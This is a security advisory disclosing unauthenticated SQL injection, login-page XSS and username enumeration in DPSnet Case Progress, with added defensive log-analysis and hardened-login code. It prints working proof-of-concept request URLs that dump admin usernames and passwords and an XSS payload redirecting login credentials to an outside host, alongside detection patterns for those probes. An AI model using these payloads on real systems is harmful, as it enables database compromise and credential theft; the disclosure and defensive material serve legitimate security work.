
ProCheckUp Security Advisory 2007.31

Posted Oct 9, 2008
Authored by Adrian Pastor, ProCheckUp | Site procheckup.com

Remote SQL injection, cross site scripting, and user enumeration vulnerabilities exist in DPSnet Case Progress.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 0a2e10b125f92c734c445d338f2ce29f6235b3cd82345ce56eea2fbf2cda1c5d


PR07-31: Unauthenticated SQL Injection, XSS and Username Enumeration on
DPSnet Case Progress

Vulnerabilities Found: 23 May 2007

Vendor Contacted: 10 July 2007, 31 August 2007, 17 September 2007, 12
December 2007

Note: the vendor stopped responding on 31 August 2007

Severity: Critical

Product description from vendor's site [1]:

"
Progress is an internet based product which enables all parties involved
in a matter, such as clients, work providers, estate agents, brokers or
solicitors to look up and track all matter details, including WIP,
accounting information, actions taken and the progress being made on all
case management files over the Internet, 24 hours a day, 7 days a week.

Through a link from your firm's own website or the DPS website, all
parties can log on to Progress and view a report of each matter. How
much each party can view of the progressed details made on a matter and
then subsequently published to the Internet is strictly controlled by
the solicitor through a secure internet link.
"

Description:

Unauthenticated SQL Injection:

Client input is being used to generate queries passed to the backend
database server. This input is not sufficiently sanitized before being
passed to the backend database server. As a result, a malicious user may
be able to craft queries that will be run on the backend database server
without any authentication, leading to sensitive information such as
administrator passwords being retrieved.

SQL injection can have very serious consequences, such as the bypassing
of authentication, querying/modifying/adding/deleting data from the
backend database and the remote execution of programs.

NO authentication is required to exploit this vulnerability.

XSS on login page:

DPSnet Case Progress is vulnerable to a vanilla XSS within the
"password" parameter processed by the login server-side script. The
victim user does NOT need to be authenticated for this vulnerability to
be exploitable.

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to DPSnet Case Progress.
This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information to
unauthorized third parties.

Username enumeration:

The login facility available on DPSnet Case Progress allows attackers to
enumerate existing usernames through manual username-guessing and
automated dictionary attacks.

Attackers can feasibly guess valid usernames provided that usernames are
predictable (e.g. [dictionary_word], [number]).

This kind of attack will most likely be launched by attackers who want
to identify administrative usernames that have elevated privileges on
DPSnet Case Progress.


SQL injection proof of concept:

The following request dumps the first username in the current table
(which appeared to be the admin user during a penetration test):

https://target.foo/progress/PasswordReminder.asp?ReminderButton=Submit&UserName='+union+select+min(Login.UserName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+Login+where+Login.UserName>'a'--


SQL error returned (notice the username 'adminuser'):

"Syntax error converting the varchar value 'adminuser' to a column of
data type int."

The following request dumps that user's password:

https://target.foo/progress/PasswordReminder.asp?ReminderButton=Submit&UserName='+union+select+min(Login.Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+Login+where+Login.UserName='adminuser'--


SQL error returned (notice the password 'p4ssw0rd!!'):

"Syntax error converting the varchar value 'p4ssw0rd!!' to a column of
data type int."


The following PoC script dumps usernames and passwords:

[removed]


XSS proof of concept:

Provided the victim is tricked into loading the following URL, the
credentials are sent to a third-party site (procheckup.com in this
case) when the login button is clicked.

https://target.foo/progress/?password=%22%3e%3c/form%3e%3cscript%3eloginform.action=%22http://procheckup.com/?%22;loginform.method=%22get%22%3c/script%3e%3c!--&



Username enumeration proof of concept:

Submitting an invalid username, e.g.:

https://target.foo/progress/default.asp?login=notvalidusername1&password=anypassword1&loginButton=Logon


Returns:

"The user name you have supplied is incorrect."

Providing a valid username, e.g.:

https://target.foo/progress/default.asp?login=validusername1&password=anypassword1&loginButton=Logon


Returns:

"Invalid password, please try again."

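As an added example from the defender's side (not part of the advisory), a small Python analyser that flags the three probe patterns shown above in constructed IIS-style log lines: SQL metacharacters in the UserName parameter of PasswordReminder.asp, markup in the reflected password parameter, and one address cycling through many usernames on default.asp. The log layout, addresses, names and the enumeration threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed IIS-style log lines (date time c-ip cs-uri-stem cs-uri-query
# sc-status). Query strings follow the advisory's proof-of-concept requests;
# addresses, usernames and timestamps are invented.
SAMPLE_LOG = """\
2008-10-09 10:00:02 203.0.113.5 /progress/PasswordReminder.asp ReminderButton=Submit&UserName='+union+select+min(Login.UserName),1,1+from+Login-- 500
2008-10-09 10:00:03 203.0.113.5 /progress/ password=%22%3e%3c/form%3e%3cscript%3eloginform.action=%22http://example.invalid/%22%3c/script%3e 200
2008-10-09 10:00:04 203.0.113.9 /progress/default.asp login=user1&password=x&loginButton=Logon 200
2008-10-09 10:00:05 203.0.113.9 /progress/default.asp login=user2&password=x&loginButton=Logon 200
2008-10-09 10:00:06 203.0.113.9 /progress/default.asp login=user3&password=x&loginButton=Logon 200
2008-10-09 10:00:07 203.0.113.9 /progress/default.asp login=admin&password=x&loginButton=Logon 200
2008-10-09 10:00:08 198.51.100.7 /progress/default.asp login=carol&password=secret&loginButton=Logon 302
"""

SQLI_RE = re.compile(r"['\"]|--|\bunion\b|\bselect\b", re.I)   # SQL metacharacters/keywords
MARKUP_RE = re.compile(r"[<>]")                                  # tag delimiters in a reflected value
ENUM_THRESHOLD = 4   # distinct usernames tried from one address; assumed tuning value

def analyse(log: str) -> list:
    """Returns (alert_type, client_ip) tuples for the probe patterns in the advisory."""
    alerts = []
    names_by_ip = defaultdict(set)
    for raw in log.splitlines():
        fields = raw.split(" ")
        if len(fields) != 6:
            continue
        ip, stem, query = fields[2], fields[3].lower(), fields[4]
        # parse_qs undoes both '+' and %xx encoding, so the patterns below see
        # the same text the ASP scripts would have concatenated into SQL or echoed.
        params = parse_qs(query, keep_blank_values=True)
        if stem.endswith("/passwordreminder.asp") and any(
                SQLI_RE.search(v) for v in params.get("UserName", [])):
            alerts.append(("sqli-probe", ip))
        if stem.startswith("/progress/") and any(
                MARKUP_RE.search(v) for v in params.get("password", [])):
            alerts.append(("xss-probe", ip))
        if stem.endswith("/default.asp") and "login" in params:
            names_by_ip[ip].update(params["login"])
    # Many different usernames from one address against the login script is the
    # signature of the enumeration the advisory describes.
    for ip, names in names_by_ip.items():
        if len(names) >= ENUM_THRESHOLD:
            alerts.append(("username-enumeration", ip))
    return alerts
```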

Affected Version: Unknown due to lack of response from vendor

Fix:

Unauthenticated SQL Injection fix:

Ensure all data originating from a client request is adequately filtered
before being passed to the back-end database server. Special characters
such as quotation marks, apostrophes, semi-colons and hyphens should
particularly be filtered. Follow a white-listing input validation
approach whenever possible.

Since there is no patch available from the vendor, it is recommended to
enforce password authentication at the web server level, so that the
vulnerable script cannot be probed by anonymous users.

XSS on login page fix:

Ensure all input is filtered sufficiently before being echoed back to
the client. In particular, characters such as left and right angle
brackets, quotation marks, apostrophes and ampersands should be
filtered. It is highly recommended to follow a white-listing input
validation approach whenever possible.

Username enumeration fix:

Change error messages so that attackers cannot determine whether the
username entered exists, e.g. "Authentication failure: username/password
combination is incorrect."
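As an added example (not part of the advisory or the vendor's product), a Python stand-in for the login and password-lookup handling that applies the three fixes above: white-list validation of the username, a parameterised query (which goes beyond the advisory's character-filtering advice), a single generic failure message, and HTML-encoding of every reflected value. The Login table schema, the placeholder stored password and the username policy are assumptions.

```python
import hmac
import html
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")   # white-list; assumed policy
GENERIC_ERROR = "Authentication failure: username/password combination is incorrect."

def build_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the product's Login table: only the
    # table and column names come from the advisory, the rest is assumed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Login (UserName TEXT PRIMARY KEY, Password TEXT)")
    db.execute("INSERT INTO Login VALUES ('adminuser', 'placeholder-secret')")
    db.commit()
    return db

def lookup_password(db: sqlite3.Connection, username: str):
    # Parameterised query: the value travels separately from the statement, so
    # quotes, '--' and 'union' inside it are plain data, never SQL.
    row = db.execute("SELECT Password FROM Login WHERE UserName = ?",
                     (username,)).fetchone()
    return None if row is None else row[0]

def login(db: sqlite3.Connection, username: str, password: str) -> tuple:
    # 1. White-list the username before it reaches the database at all.
    if not USERNAME_RE.fullmatch(username):
        return False, GENERIC_ERROR
    stored = lookup_password(db, username)
    # 2. Unknown user and wrong password share one code path, one comparison and
    #    one message, so the response no longer reveals whether the name exists.
    candidate = stored if stored is not None else "\0"
    matches = hmac.compare_digest(candidate.encode(), password.encode())
    if stored is None or not matches:
        return False, GENERIC_ERROR
    return True, "Logged in"

def render_form(username: str = "", error: str = "") -> str:
    # 3. Every reflected value is HTML-encoded and the password is never echoed,
    #    so input such as "></form><script> cannot break out of the attribute.
    return ('<form id="loginform" method="post" action="default.asp">'
            f'<input name="login" value="{html.escape(username, quote=True)}">'
            '<input name="password" type="password" value="">'
            f'<p>{html.escape(error)}</p></form>')
```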

References:

[1] http://www.dpssoftware.co.uk/online.asp

ProCheckUp Security Vulnerabilities and Advisories:
http://www.procheckup.com/Vulnerabilities.php


Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is
attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.